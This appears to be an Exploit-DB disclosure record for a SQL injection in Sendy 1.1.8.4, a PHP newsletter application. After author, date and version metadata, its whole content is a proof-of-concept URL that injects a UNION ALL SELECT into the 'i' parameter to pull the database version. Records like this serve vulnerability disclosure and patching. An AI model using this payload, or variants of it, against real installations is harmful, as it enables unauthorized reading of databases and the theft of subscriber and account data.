Sendy 1.1.8.4 - SQL Injection

EDB-ID:

31898


Author:

Hurley

Type:

webapps


Platform:

PHP

Date:

2014-02-25


# Exploit Title: Sendy SqlInject
# Date: 2014-02-24
# Exploit Author: Hurley
# Vendor Homepage: http://sendy.co/
# Software Link: http://sendy.co/
# Version: 1.1.8.4

Demo page:
http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--